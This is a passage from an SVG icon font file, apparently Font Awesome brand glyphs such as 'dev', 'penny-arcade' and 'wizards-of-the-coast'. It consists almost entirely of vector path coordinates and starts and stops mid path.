c-2.2002 2.2002 -5.59961 4.60059 -7.7002 7.80078c3.7998 5.59961 2.2002 14.3994 -4.7002 14.3994c-4.2998 0 -7.7998 -4.5 -6.39941 -9.89941c-0.700195 -2.40039 -1 -5.60059 -0.5 -8c-4.90039 2.59961 -6.5 6 -7.5 9c-1.2998 -2.5 -2.10059 -6 -1.10059 -9.40039z
M301.2 261c0.299805 1.7002 -3.10059 4.59961 -4.7998 5.2002c4.7998 0.200195 7 -0.600586 7 -0.600586c-1.30078 1.7002 -1.60059 4.5 -1 6.7002c2.5 -6.09961 11.6992 -7.09961 13.8994 -12.2002c-0.299805 2.30078 -2.39941 4.7002 -4.7998 6.10059
c-1.2998 3.2002 -0.299805 9.39941 1.2998 11c-0.5 -8.7998 12 -13.7998 14.6006 -20.2002c-1.40039 5.5 -7.40039 9 -10.1006 12.2002c-1 2.09961 -0.200195 5.7998 0.799805 7.09961c-0.5 -9.7002 15.8008 -14.2998 14.1006 -23.8994
c0.899414 -0.400391 2.09961 -1.2002 1.89941 -2.60059c1.30078 0.299805 2.60059 1.7002 2.90039 2.7002c0.700195 -4.5 -1.90039 -9 -4.7998 -10.4004c1.59961 4 -2.7002 5.60059 -6.7002 5.10059c0 0 1.59961 2.2998 1 3.39941
c-0.799805 1.5 -8 0.800781 -11.2002 -0.299805c1.10059 0.100586 3.60059 -0.200195 4.60059 -0.5c-2.10059 -2.89941 -1 -7.09961 1.2998 -4.2002c0 0 -1.10059 -3.5 -0.299805 -4.2998c0.799805 -0.799805 2.59961 -0.200195 2.59961 -0.200195
c-1.2002 -2.69922 -5.2998 -4.59961 -8.2002 -4.59961c1.10059 0.400391 2.7002 2.2998 3 3.40039c-0.799805 -0.5 -2.7002 -0.700195 -3.5 -0.5c6.10059 3 0 13.1992 -7 8.19922c1 2.7002 3.7002 5.30078 5.7998 6.10059c-1.2998 0.5 -2.69922 0.799805 -4.2998 1.09961
c1.7998 1.5 6.2998 2.7998 8.5 2.60059c-3.5 0.799805 -9.89941 -0.300781 -12.7998 -3.7002c0.900391 0 3.2998 -0.5 4.2998 -0.799805c-4 -0.700195 -9.39941 -4.40039 -11 -6.2002c0.299805 2.2002 1 4.2002 0.5 5.59961c-0.799805 2 -3 2.7998 -7.7998 1.7998
c3.2002 3.2002 9.7002 5.10059 10.2002 6.90039zM327.1 253.6c0 0 -0.899414 3 -4.19922 4.30078c0.699219 -2.2002 1.5 -4.30078 4.19922 -4.30078zM366 249.9l0.700195 0.699219c0.5 0.400391 1.59961 0.900391 2.7002 1.40039v-18.4004
c-1.7002 0.800781 -3.5 1.10059 -5.60059 1.10059c-2.39941 0 -5 -0.5 -5 -0.5c-0.5 0.5 -3.59961 2.89941 -5.09961 3.2002c4.09961 -4.30078 0.5 -9.80078 -3 -7.2002v15.7002c0.700195 0.799805 1.2998 1.7998 2.09961 2.59961
c1.7002 2.09961 4.60059 3.40039 7.5 3.40039c1.7998 0 3.60059 -0.400391 4.7002 -1.40039zM79.9004 142.1c22 -6.39941 19.3994 -20.0996 19.3994 -25.1992c0 -7.80078 -3.2002 -13.6006 -9.89941 -17.6006c-12.6006 -7.39941 -24.7002 -5.89941 -86.4004 -5.89941
l8.40039 8.59961v32.2998l-11.4004 14.6006h11.2998v29.5l-8.2998 8.59961h56.0996c12.9004 0 37 -4.40039 37 -25c0 -1.90039 1 -15.2998 -16.1992 -19.9004zM38.5996 169.6v-20.8994c10.6006 0 29.6006 -3.2998 29.6006 8.7998v3
c0 9.90039 -9.60059 9.09961 -29.6006 9.09961zM38.5996 110.4c20.4004 0 32.9004 -1.90039 32.9004 9.2998h-0.200195v4.5c0 11.0996 -20.5 8.7998 -32.7002 8.7998v-22.5996zM139.8 129.7v-15.4004l60.1006 0.200195l-14.1006 -21.2002h-81.2002l7.40039 8.2002v77.0996
l-7.40039 8.2002l73.5 0.200195v-0.200195l14.1006 -21h-52.4004v-14.8994h37.2002l-14.0996 -21.2002v-0.200195zM354.5 189.8c73.7998 0 77.5996 -99.2998 -0.299805 -99.2998c-77.2002 0 -73.6006 99.2998 0.299805 99.2998zM354.2 112.3
c39 0 37 55.2002 0.200195 55.2998c-37.1006 0 -37.6006 -55.2998 -0.200195 -55.2998zM262.9 120.6l0.199219 -19l7.2002 -8.19922h-42.5996l7.7002 8.19922l-0.200195 19.4004l-44.1006 65.7998h44.9004l-6.40039 -7.2002l21 -37.1992h0.300781l20.5 37.1992
l-6.10059 7.2002h41.7002zM234.5 271.9c-9.09961 6.69922 -9.5 14.0996 -9.59961 14.8994c7.2998 -4.2998 9 -4 39.8994 -4c-5.7998 0 24 3.10059 32.2002 -22.8994c-0.400391 0 -8.40039 -4.80078 -10.4004 -7.90039c5.30078 1.90039 8.90039 1.09961 9 1.09961
c-8 -5.09961 -9.59961 -14.7998 -9.59961 -20.5c0.900391 2.10059 2.7002 3.7002 2.7002 3.5c-0.600586 -2.5 -1.40039 -7 -0.799805 -12c-8.60059 -7.09961 -16 -8.59961 -26 -8.59961h-35.1006c0.400391 0.0996094 7.7998 4.5 7.90039 4.59961
c1.89941 1.10059 2.7002 2.2002 2.7002 6.40039v38.7998c0 4.2002 -1.30078 5.2998 -2.90039 6.60059zM256 266.4v-34.6006c4.7002 0 23.0996 -3.39941 23.0996 17.2998c0 20.6006 -18.5 17.3008 -23.0996 17.3008zM484.9 186.8l39.1992 -0.0996094l-7.39941 -8.2998
v-85.2002h-21.2998c-4 12.7002 -44.8008 45 -48.5 55.5996h-0.300781v-47.3994l7.40039 -8.2002h-39l7.2002 8.2998v76.9004l-7.40039 8.5h31.6006c2.89941 -9.40039 39.7998 -36.5 45.1992 -50.9004h0.300781v42.5zM378.2 282.9
c32.7002 -1.60059 33.7998 -29.8008 33.7998 -33.6006c0 -6.7002 -3.2998 -34 -36.7002 -34h-0.299805c3.59961 4.2998 3.5 11.9004 -2.2002 16.2998c1.2002 0 19.7002 -3.19922 19.7002 17.3008c0 20.6992 -18.4004 17.2998 -23.0996 17.2998v-4.2998
c-5.40039 0.799805 -7.40039 -0.300781 -7.5 -0.300781c2.09961 1.80078 4.5 2.60059 6.09961 2.90039c-7.09961 1.59961 -13.5996 -2.40039 -14.5996 -3.5c0.799805 1.7998 2.39941 3.40039 3.5 4.5c-2.30078 -0.799805 -4.30078 -1.90039 -6.10059 -3
c0 5.2002 0.200195 7.5 -2.89941 9.5c-9.10059 6.59961 -9.5 14.2002 -9.60059 14.9004c7.10059 -4.2002 7.7002 -4 39.9004 -4z" />
    <glyph glyph-name="dev" unicode="&#xf6cc;" 
d="M120.12 239.71c3.87012 -2.90039 5.82031 -7.25977 5.83008 -13.0596v-69.6504c0 -5.80957 -1.94043 -10.1602 -5.82031 -13.0596c-3.87988 -2.90039 -7.76953 -4.35059 -11.6494 -4.35059h-17.4502v104.47h17.4395c3.87988 0 7.77051 -1.44922 11.6504 -4.34961z
M404.1 416c24.2002 0 43.8408 -19.5898 43.9004 -43.7998v-360.4c-0.0595703 -24.21 -19.6904 -43.7998 -43.9004 -43.7998h-360.199c-24.2002 0 -43.8408 19.5898 -43.9004 43.7998v360.4c0.0595703 24.21 19.7002 43.7998 43.9004 43.7998h360.199zM154.2 156.81
l-0.00976562 70.9307c-0.0107422 18.8193 -11.9307 47.2793 -47.3701 47.2793h-47.3799v-165.46h46.3994c36.75 -0.0595703 48.3604 28.4404 48.3604 47.25zM254.88 245.47l0.00976562 29.5205h-63.1895c-11.1504 -0.280273 -19.9805 -9.54004 -19.71 -20.6904v-125.109
c0.279297 -11.1602 9.55957 -19.9805 20.7197 -19.6904h62.1797v29.5703h-53.29v38.4102h32.5703v29.5693h-32.5703v38.4199h53.2803zM358.52 130.18l38.4609 144.801h-32.5801l-29.5703 -113.721l-29.71 113.721h-32.5703l38.5303 -144.801
c10.5898 -24.6299 34.2402 -30.75 47.4395 0z" />
    <glyph glyph-name="fantasy-flight-games" unicode="&#xf6dc;" horiz-adv-x="512" 
d="M256 415.14l223.14 -223.14l-223.14 -223.14l-223.14 223.14zM88.3398 192.17c11.3447 -11.2461 29.7705 -29.4893 41.1299 -40.7197c20.1602 19.8799 40.46 39.8994 61.8506 60.9902c12.0596 -12.5801 24.5195 -25.5703 36.54 -38.1104
c12.0293 11.6895 23.7393 23.0596 35.6895 34.6602c-6.99023 7.4502 -32.1494 32.8301 -35.0898 35.7793c-1.91016 1.9209 -2.29004 3.2207 -0.120117 5.35059c15.5801 15.2295 39.21 17.79 56.9805 5.09961c7.98926 -5.70996 14.2998 -11.6396 48.5098 -43.9502
c10.8203 11.1504 22.2295 22.8506 33.5 34.6904c0.490234 0.520508 0.0996094 2.63965 -0.580078 3.37988c-0.0898438 0.100586 -37.5195 40.6006 -62.1504 59c-33.5801 25.0801 -78.3193 23.0605 -119.77 -18.6895c-84.5703 -85.1807 -94.5303 -95.4805 -96.4902 -97.4805z
M323.16 90.5703c18.8203 18.79 80.3301 80.6396 100.5 101.5c-13.7305 13.4492 -27.1797 26.6299 -40.8604 40.0293c-20.0098 -19.7393 -40.2402 -39.6895 -61.25 -60.4199c-12.3301 12.8301 -24.8799 25.8799 -37.25 38.75
c-1.25977 -0.689453 -1.64941 -0.80957 -1.91016 -1.06934c-10.7295 -10.7705 -21.4199 -21.5801 -32.21 -32.29c-2.22949 -2.20996 -0.519531 -3.35059 0.800781 -4.69043c10.5791 -10.7402 21.1797 -21.4502 31.7695 -32.1797
c3.5498 -3.60059 3.54004 -3.85059 -0.139648 -7.24023c-16.8008 -15.4697 -40.8408 -16.54 -59.3203 -1.7998c-7.62012 6.08008 -11.6602 10.1797 -44.6797 42.0898c-11.5801 -11.8896 -23.3203 -23.9404 -35.3701 -36.3096
c33.5498 -34.7607 50.8496 -53.3408 72.9297 -66.8408c28.9004 -17.6699 71.5 -14.96 106.99 20.4707zM256 448l256 -256l-256 -256l-256 256zM16 192l240 -240l240 240l-240 240z" />
    <glyph glyph-name="penny-arcade" unicode="&#xf704;" horiz-adv-x="639" 
d="M421.91 283.73c7.33984 -16.2705 2.29004 -5.07031 24.6299 -54.6807l-39.7305 -10.6094c13.7002 59.2295 10.6104 45.8398 15.1006 65.29zM215.82 232.62c32.5 8.99023 41.9492 -37.6396 -0.350586 -47.4297c-14.2002 -3.77051 -6.64941 -1.75 -34.8193 -9.34082
l-4.45996 46.1904c28.3193 7.5498 19.4395 5.17969 39.6299 10.5801zM541.98 258.81c75.7998 -37.9092 98 -76.3193 97.9893 -104.47c2.10059 -78.8496 -183.3 -130.33 -399.89 -84.8301c0.540039 -13 -8.00977 -24.6494 -20.5801 -28.0195
c-125.54 -33.54 -117.35 -31.75 -122.53 -31.7598c-14.3701 -0.0107422 -26.4102 10.8896 -27.7998 25.1992l-4.2998 44.4805c-0.0683594 0.724609 -0.125 1.90332 -0.125 2.63184c0 10.5811 8.01758 22.2461 17.8945 26.0381l-1.73926 17.8799
c-50.2305 28.2598 -80.9004 61.8701 -80.9004 95.3701c0 72.9199 144.26 113.4 309.41 98.3701c2.68945 7.54395 11.1514 15.3438 18.8896 17.4102c96.8701 25.9092 65.3203 17.4795 135.59 36.2295c13.1602 3.50977 26.9307 -2.95996 32.6201 -15.3301zM255.14 149.7
c17.5 4.0498 40.2363 19.1562 50.75 33.7197c21.6006 32.5898 14.1104 105.561 -42.5498 104.43c-16.04 -0.229492 -8.07031 0.890625 -186.22 -46.6494l4.34961 -44.5l20.1201 5.38965l11.1104 -114.64l-20.0205 -5.35059l4.30078 -44.5195l115.31 30.7803
l-4.50977 44.5098l-20.5303 -5.50977l-2.45996 23.5498l48.4404 12.9102zM454.32 133.08l108.55 28.96l-4.2998 44.4795l-20.79 -5.55957l-66.6699 145.47c-70.5801 -18.8301 -42.2305 -11.25 -135.591 -36.2393l4.2002 -44.4805l17.1504 4.55957l-33.0801 -126.47
l-20.9902 -5.58984l4.45996 -44.4297l112.851 30.0693l-4.05078 39.54l-19.1992 -5.12012l4.09961 17.54l57.7598 15.4209l6.61035 -14.6807l-14.9004 -3.97949z" />
    <glyph glyph-name="wizards-of-the-coast" unicode="&#xf730;" horiz-adv-x="640" 
d="M219.19 102.31c7.44922 5.80078 16.2598 0.680664 21.7295 -7.0791c7.08984 -10.1201 6.24023 -18.1602 -0.259766 -23.04c-7.62012 -6.24023 -17.0898 0.129883 -21.7305 6.5498c-10.8096 15.1299 -1.63965 22.1895 0.260742 23.5693zM555.94 26.3701
c1.30957 4.4502 3.92969 10.21 3.93945 20.1699c0 34.04 -41.6299 64.4102 -100.03 68.0801c-53.1592 3.39941 -120.46 -15.4502 -184.35 -73.8506l-0.790039 0.260742c1.58008 10.4697 -0.780273 16.2295 -3.40039 21.21l0.260742 1.56934
c64.4199 51.3203 134.069 66.5107 188.8 60.4902c61.0098 -6.54004 104.479 -39.54 101.34 -78.0303c-0.790039 -9.68945 -2.88965 -15.71 -4.97949 -19.8994c-1.34082 -1.66992 -1.13086 -1.7002 -0.790039 0zM392.28 207.58
c-0.530273 7.07031 3.13965 11.7803 6.7998 15.46c3.66992 3.91992 14.9297 10.4697 14.9297 10.4697s-1.2998 -26.4502 -2.08984 -29.8496c-1.04004 -3.92969 -4.96973 -6.81055 -10.4697 -6.5498c-4.98047 0.259766 -8.37988 3.39941 -9.16992 10.4697zM342.26 358.68
c147.17 0 275.48 -86.6797 291.21 -196.939c0 0 -3.66992 -1.31055 -9.68945 -4.4502c0 -0.259766 1.0498 -10.7402 0.259766 -16.5c-0.259766 -1.83008 -1.0498 -1.0498 -1.0498 0c-0.270508 5.24023 -1.57031 11.5303 -2.36035 14.9297
c-4.70996 -2.60938 -10.21 -6.54004 -15.9697 -11.7793c0 0 4.70996 -10.21 4.70996 -25.9209c0 -21.21 -8.37988 -32.9893 -16.5 -37.9697l-0.259766 0.520508c9.16992 9.16992 12.5693 21.4795 12.5693 31.9492c0 13.8701 -6.80957 33.25 -14.3994 41.3701
c0 0 4.4502 -8.12012 6.80957 -17.8096c0 0 -21.21 -21.4697 -26.9697 -62.3203c0 0 -3.66992 9.16992 -10.7402 16.2402c0 0 12.0498 -15.4502 12.0498 -38.2305c0 -19.3799 -12.8398 -37.4395 -27.5 -48.1797c-0.989258 0 -0.790039 -0.169922 -0.790039 0.790039
c15.71 12.8301 22.2607 28.0205 22.2607 46.3506c0 38.2295 -49.2305 80.3896 -130.15 80.3896c-96.1104 0 -181.74 -58.1299 -236.99 -128.05l-1.0498 0.259766c-40.3203 120.979 -135.64 185.66 -196.13 202.16c-2.09961 0.519531 -1.83984 0.790039 -0.790039 1.30957
c12.3096 14.4004 136.96 151.88 341.47 151.88zM243.02 69.0596c16.8408 14.5908 4.99023 30.7705 4.71094 31.1602c-4.08008 5.99023 -16.3105 16.8506 -31.1602 5.5c-10.9502 -8.37988 -11.6406 -22.8896 -4.19043 -32.4697
c6.44043 -8.26953 19.5801 -13.1797 30.6396 -4.19043zM245.11 205.49l1.83008 -8.11035l-3.6709 4.4502l-14.1396 -26.71l24.6201 -28.7998l12.5703 6.01953l-11.7803 70.96zM263.7 87.9102c3.41016 2.35938 7.33984 4.97949 9.67969 6.57031l-0.259766 0.259766
c-1.56055 -0.780273 -3.11035 -1.0498 -12.5703 15.9697v0.259766c6.87012 5.16016 8.45996 4.89062 11.5205 5.5l0.259766 0.260742c-1.31055 3.66992 -1.31055 3.66992 -1.83008 5.5h-0.259766c-3.95996 -3.31055 -1.4707 -1.58008 -11.5205 -7.86035h-0.259766
c-1.83008 3.13965 -4.19043 7.33008 -5.75977 9.68945v1.31055c4.4502 3.91992 10.2197 6.7998 12.3096 7.58984c2.87988 1.0498 4.19043 0.520508 5.24023 0.259766l0.259766 0.520508c-1.30957 1.83008 -2.08984 2.87988 -3.39941 4.70996l-0.520508 0.259766
c-9.9502 -5.5 -17.54 -9.9502 -25.3994 -15.71l0.259766 -0.519531c1.30957 0.259766 3.13965 -0.260742 4.4502 -2.62012c15.04 -25.0801 19.5898 -27.5908 17.54 -31.6904zM318.96 120.38v0.25c-1.99023 0 -2.34961 -1.37012 -14.6602 30.6396v0.260742
c4.95996 1.85938 8.78027 4.37988 12.3105 2.62012l0.259766 0.519531l-3.13965 4.98047l-0.520508 0.259766c-2.22949 -0.929688 -20.4697 -8.00977 -27.7598 -12.5703l-0.259766 -0.519531l1.0498 -5.76074h0.519531c1.0498 3.68066 9.7998 7.33008 9.9502 7.33008
l0.259766 -0.259766c12.9404 -29.7598 13.0703 -29.8799 11.7803 -32.4697l0.259766 -0.259766c3.93066 2.09961 6.81055 3.40918 9.9502 4.97949zM363.73 136.88c-0.780273 0.520508 -2.09082 1.31055 -2.63086 3.92969c-1.56934 6.02051 -4.70996 20.1709 -6.2793 26.4502
c-0.530273 1.57031 -0.530273 3.14062 0.519531 4.4502l-0.259766 0.259766c-3.41016 -0.529297 -6.29004 -1.30957 -10.7402 -2.35938v-0.260742c1.57031 -0.529297 2.10059 -2.09961 2.62012 -3.92969l2.62012 -9.42969l-0.259766 -0.259766
c-3.40039 -1.05078 -8.90039 -2.62012 -12.8301 -3.93066h-0.259766c-0.780273 2.10059 -1.83008 5.75977 -3.14062 9.69043l0.259766 4.70996l-0.259766 0.259766c-4.71973 -1.30957 -7.59961 -2.34961 -10.7402 -3.40039v-0.519531
c1.05078 0 2.10059 -1.30957 2.62012 -3.13965c1.0498 -3.40039 8.12012 -24.0908 9.16992 -27.2305c0.790039 -2.09961 0.790039 -3.66992 -0.259766 -4.97949l0.259766 -0.260742c3.14062 1.31055 6.54004 2.87988 10.21 3.93066v0.519531
c-1.0498 0.259766 -2.08984 0.780273 -2.87988 3.13965c-1.0498 3.93066 -3.39941 11.2607 -4.18945 13.8809l0.259766 0.259766c3.92969 1.30957 9.42969 3.13965 12.8301 3.92969l0.259766 -0.259766c0.530273 -2.09961 2.62012 -10.2197 3.66992 -13.6201
l-0.519531 -4.4502l0.259766 -0.259766c4.4502 1.57031 5.5 1.83008 9.69043 2.87988zM395.94 143.69c0.529297 1.8291 1.0498 3.65918 1.5791 6.04004h-0.259766c-2.0293 -4.06055 -15.0898 -5.09082 -16.2402 -4.71094l-0.259766 0.260742
c-0.519531 3.13965 -1.83008 10.4795 -2.08984 12.5693l0.259766 0.260742c8.06055 0.899414 5.40039 1.0293 10.21 0h0.260742c0 3.40918 0.259766 3.66992 0.259766 5.23926h-0.259766c-5.98047 -2.2998 -1.2207 -0.679688 -10.7402 -2.35938l-0.259766 0.259766
c-0.520508 3.40039 -1.31055 8.37988 -1.57031 9.9502l0.259766 0.259766c12.9004 2.41016 15.1006 0.349609 16.2402 -0.790039l0.259766 0.259766c-0.780273 2.36035 -1.0498 3.14062 -1.57031 5.5l-0.259766 0.260742
c-4.71973 -0.260742 -15.71 -1.05078 -24.8799 -2.62012l-0.790039 -0.520508c1.83008 -0.790039 2.36035 -1.83984 2.62012 -3.66992c1.58008 -7.59961 3.41016 -18.3301 4.98047 -26.1895l-0.790039 -4.19043l0.259766 -0.259766
c8.37988 1.83008 17.8096 3.66992 22.5195 4.18945zM406.68 188.2c3.14062 1.56934 7.33008 5.5 7.33008 5.50977c1.95996 -4.58008 0.970703 -2.70996 4.19043 -7.86035c10.1494 -0.459961 8.60938 0.0205078 20.4297 -1.0498l0.790039 4.70996
s-4.18945 0 -5.75977 1.83008c-1.0498 1.31055 -1.31055 3.14062 -1.57031 5.5c0 2.36035 0.270508 16.5 0.790039 20.6904c0.259766 4.18945 2.08984 20.4199 2.08984 23.04c0.260742 2.62012 1.0498 8.91016 0.260742 12.0498
c-4.82031 19.2803 -24.4307 17.8096 -50.0205 16.2402l-5.24023 -16.2402l2.62012 -2.87988c16.5498 16.5498 37.6201 4.56934 29.5898 -5.75977c-5.18945 -6.9209 -19.7393 -8.90039 -28.54 -17.0205c-6.47949 -6.49023 -12.2393 -20.9004 -5.5 -31.6904
c6.12988 -11.0391 17.29 -9.96973 17.54 -9.94922c2.87988 0 6.55078 0.519531 11 2.87988zM443.86 166.99c0 1.83984 0.269531 4.18945 0.269531 5.25l-0.259766 0.519531c-14.3604 8.98047 -26.8604 0.919922 -28.7998 -9.9502
c-2.83984 -16.0898 15.3594 -25.46 25.6602 -18.5898l0.519531 0.520508c0 0.259766 1.30957 4.4502 1.83008 6.2793l-0.259766 0.260742c-6.39062 -9.58008 -23.3203 -6.87012 -20.6904 10.21c1.91016 12.6602 15.3799 16.0801 21.7305 5.5zM449.63 254.72
c0 0 4.96973 -0.790039 4.99023 -3.66016c0 -2.08984 -4.98047 -55.25 -4.98047 -55.25c-0.109375 -1.48926 -0.339844 -6.80957 -7.58984 -6.80957l-0.790039 -4.70996c18.3906 -2.83008 19.3701 -3.04004 36.9199 -7.33008l0.520508 4.70996
c-13.0498 3.91992 -9.74023 7.37012 -4.4502 46.0898c1.09961 0.870117 8.62012 7.14062 20.6904 0.790039l11.2598 11.2598s-9.69043 8.90039 -14.9307 7.33008c-5.23926 -1.30957 -15.4492 -10.7393 -15.4492 -10.7393l1.56934 17.54
c-8.10938 4.0498 -27.0693 7.3291 -27.7598 7.3291v-6.5498zM460.62 140.28c9.42969 -2.35059 16.2402 2.62012 18.8496 11.5195c2.08984 7.60059 -1.56934 16.7598 -10.7393 19.3799c-6.54004 2.10059 -15.7109 -0.779297 -18.8506 -10.21
c-3.39941 -9.68945 2.62012 -18.5996 10.7402 -20.6895zM502.78 130.59c-0.780273 1.31055 -1.04004 2.10059 -0.799805 3.91016c1.22949 27.0098 1.5293 24.6602 1.0498 25.1396c-2.08984 0.790039 -5.5 2.09082 -7.58984 2.87988l-0.520508 -0.259766v-2.08984
c-3.92969 -6.01953 -10.4795 -15.4502 -13.8799 -20.1602l-2.62012 -1.83008v-0.259766c2.08984 -0.259766 4.70996 -1.30957 6.02051 -1.57031v0.260742l0.790039 3.39941c0.789062 1.0498 2.35938 3.66992 3.66992 5.5c0.40918 0 2.25 -0.549805 7.06934 -2.35938
c0.330078 -0.320312 0.330078 0.649414 -0.259766 -7.59082l-1.57031 -1.8291v-0.260742c1.57031 -0.519531 6.28027 -2.35938 8.64062 -2.87988zM498.07 220.41c-13.2207 -21.1504 -9.39062 -51.6006 9.66992 -52.9004c5.75977 -0.259766 9.42969 3.93066 9.68945 3.66992
l-2.08984 -6.80957c8.91016 -4.21973 11.4404 -5.29004 17.8105 -8.63965l1.83008 4.44922c-6.14062 3.51074 -1.29004 11.25 24.6191 84.3203c-6.13965 6.45996 -10.2998 10.0596 -22.5195 20.4297l-1.83008 -3.66992c1.62988 -1.35938 6.79004 -5.00977 4.4502 -11.2598
l-7.58984 -26.1904c-3.28027 12.79 -22.79 14.8701 -34.04 -3.39941zM527.4 141.07l2.35938 3.39941v0.520508c-3.41016 6.83008 -11.9395 7.41992 -14.6602 2.35938c-1.83984 -3.40918 0.260742 -7.06934 1.83008 -9.68945
c1.57031 -2.87988 3.14062 -6.29004 2.08984 -8.37988c-2.31934 -4.62988 -8.94922 -0.680664 -8.37988 4.97949l-0.790039 -0.259766c-2.09961 -4.7998 -1.83008 -4.00977 -1.83008 -4.70996c3.05078 -6.09961 12.8105 -7.12988 15.4502 -0.790039
c1.57031 3.15039 0.520508 6.80957 -1.0498 9.42969c-1.83008 3.40039 -4.18945 6.29004 -2.87988 8.37988c1.51953 2.65039 7.86035 0.470703 7.86035 -5.23926zM548.61 127.71l1.30957 3.91016l-0.259766 0.259766c-2.36035 2.08984 -8.64062 6.54004 -12.3105 8.90039
h-0.259766l-3.13965 -3.40039v-0.259766c4.7998 -0.320312 3.37988 0.149414 6.01953 -1.83008v-0.259766c-2.62012 -4.9707 -6.0293 -11.2607 -9.16992 -17.0205l-2.08984 -1.30957l-0.259766 -0.259766l5.75977 -4.4502l0.259766 0.259766
c-0.259766 0.530273 -0.519531 1.57031 0.790039 3.92969c2.87988 5.77051 6.28027 12.0508 8.64062 16.2402h0.259766c3.54004 -2.57031 2.49023 -1.43945 4.4502 -4.70996zM575.84 171.97l7.85059 10.46s-9.4209 18.8604 -23.04 16.5
c-20.8408 -4.0293 -3.15039 -34.21 -2.09082 -38.2295c4.33008 -15.1299 -16.3193 -12.5605 -13.3496 5.24023l-2.87988 2.08984l-4.98047 -14.4004s11.7803 -11.2598 20.1602 -10.4697c8.12012 0.790039 13.8799 6.29004 13.8799 16.5
c0 8.37988 -7.85938 22.7803 -7.85938 27.7598c0 6.86035 12.2695 4.75977 11.5195 -4.97949c-0.259766 -2.61035 -1.2998 -5.23047 -2.08984 -7.59082zM611.46 182.18c0.780273 -2.35938 1.57031 -1.83008 0.790039 0.270508
c-32.4697 98.9795 -132.76 138.78 -199.8 139.83c-50.54 0.779297 -89.5605 -11.79 -131.98 -35.8799l20.6904 61.0098l-33.7803 -65.7305l-8.89941 20.9502c3.13965 1.04004 6.2793 2.08984 6.2793 2.08984l-2.62012 8.64062s-3.13965 -0.780273 -7.33008 -2.09082
l-12.0498 28.2803l13.6201 -61.0098c-5.12012 2.55957 -19.0996 6.83008 -6.5498 19.3799l-2.62012 11c-6.97949 -2.21973 -13.2295 -3.62012 -32.21 -9.68945l-23.0801 11.5l59.1797 -42.6807l-4.70996 -2.08984l-17.2793 13.8799
c2.23926 -5.13965 3.2998 -12.1699 4.70996 -19.6396l-28.54 -13.0898l-30.1104 36.1396l-17.2803 -9.16992l13.6201 -42.4199l-11.2598 -4.98047l94.2695 29.3301l-3.66992 -10.4697l-0.519531 3.13965l-13.0898 -3.39941l4.97949 -24.6201l-4.4502 -12.3105
l-25.6592 30.6406l-39.8008 -10.21l18.8506 -58.9199c-60.1299 62.3994 -67.7002 66.3994 -61.7998 75.6797c2.09961 2.87988 7.85938 7.07031 7.85938 7.07031l-4.18945 7.06934c-26.7803 -18.3496 -27.8398 -19.1494 -58.4004 -42.6797l4.98047 -6.01953
s8.12012 5.75977 13.6201 5.5c7.81934 -0.350586 1.76953 2.93945 113.659 -98.7305l11.7803 8.37988l-27.7598 93.4805l35.8799 -42.1602l-4.70996 -13.8799l41.9004 88.5098c34.6699 -80.5098 29.1494 -66.9502 32.9893 -78.8203l-33.5195 67.2998l-2.36035 -4.44922
c1.2998 -1.30078 -0.919922 3.05957 22.7803 -59.4404c3.22949 -8.88965 -1.10059 -9.88965 -5.5 -12.8301l2.36035 -4.70996c15.3594 6.79004 22.9395 9.54004 39.0195 14.4004l-1.0498 4.97949c-8.89062 -1.33008 -10.1006 0.169922 -12.0498 4.4502
c-1.05078 2.09961 -14.1504 40.0703 -20.4307 58.6602l-10.21 4.97949l-2.35938 8.12012l61.54 -36.6602l-13.0908 -43.21c12.1904 3.26074 27.0303 6.74023 49.4902 9.9502l-0.259766 26.71l-4.98047 -1.0498c-0.669922 -13.7998 -6.0293 -22.0801 -19.6396 -22.7803
l22.2598 80.3906c-27.6201 -0.450195 -59.2695 -7.19043 -66.7695 -8.90039l3.92969 -16.5l-25.1396 19.6396l91.3896 20.6904l-85.6299 -9.16992c38.4902 22.5195 79.3398 39.0195 132.76 37.9697c131.46 -2.08984 180.95 -99.2402 191.95 -129.62zM203.48 295.57
l2.35938 -8.64062c7.82031 2.61035 10.8604 2.36035 11.2598 2.36035l-9.42969 7.58984c-2.36035 -0.790039 -4.18945 -1.30957 -4.18945 -1.30957zM347.24 257.07l-11.5303 -37.71l-21.7295 17.0195c6.7998 25.5 31.6895 21.29 33.2598 20.6904zM318.43 380.93
c224.94 0 321.83 -143.76 321.57 -227.55c0 -11 -0.269531 -17.5498 -0.790039 -19.6396c-0.259766 -2.10059 -1.0498 -0.790039 -1.0498 0.519531v9.9502c0 106.58 -121.51 223.37 -301.67 223.37c-61.2705 0 -103.69 -12.0498 -110.24 -13.8799l-1.57031 0.259766
c-6.80957 7.58984 -12.8301 9.69043 -21.21 11.7803v0.790039c8.91016 2.34961 56.5605 14.3994 114.96 14.3994zM529.49 211.25c-8.61035 -34.4502 -13.6504 -35.3496 -18.3301 -35.3604c-7.33008 0 -6.81055 9.43066 -6.02051 14.9307
c0.879883 9.72949 7.40039 34.6494 17.0205 33.5195c7.33008 -0.780273 8.63965 -7.33008 7.33008 -13.0898zM467.96 168.3c3.40039 -0.780273 7.84961 -4.4502 5.23047 -14.3896c-2.88086 -11.2598 -8.11035 -11.79 -11.7803 -10.7402
c-5.5 1.31055 -7.85059 7.84961 -6.02051 14.6602c3.14062 11.2598 9.9502 11.2598 12.5703 10.4697zM491 147.35v0.270508c1.0498 1.83008 5.5 8.63965 6.5498 9.9502c-0.269531 -3.66992 -0.790039 -10.2207 -0.790039 -12.0508
c-2.62012 0.780273 -3.92969 1.31055 -5.75977 1.83008z" />
    <glyph glyph-name="think-peaks" unicode="&#xf731;" horiz-adv-x="529" 
d="M442.4 38.5996l-206.2 353.801l-204.2 -352.101l-32 0.299805l236.2 407.4l206.2 -353.9l55.0996 95l32 -0.299805zM87.0996 82.7002l149.601 257.899l235.8 -404.6l-32.5 0.0996094l-203.4 349.101l-117.399 -202.5h-32.1006z" />
    <glyph glyph-name="reacteurope" unicode="&#xf75d;" horiz-adv-x="570" 
d="M247.6 236.2l2 6.7998l-5.69922 4.2998l7.19922 0.100586l2.30078 6.7998l2.2998 -6.7998l7.09961 -0.100586l-5.7002 -4.2998l2.10059 -6.7998l-5.7998 4.09961zM311.3 236.2l1.90039 6.7998l-5.7002 4.2998l7.2002 0.100586l2.2998 6.7998l2.2998 -6.7998
l7.2002 -0.100586l-5.7002 -4.2998l2.10059 -6.7998l-5.80078 4.09961zM220 185.7c4.90039 0 3.7998 -3.90039 3.7998 -13.7998c0 -10.3008 -6.7002 -14.1006 -16.7998 -14.1006h-0.200195c-10.0996 0 -16.7998 3.7002 -16.7998 14.1006v40.0996
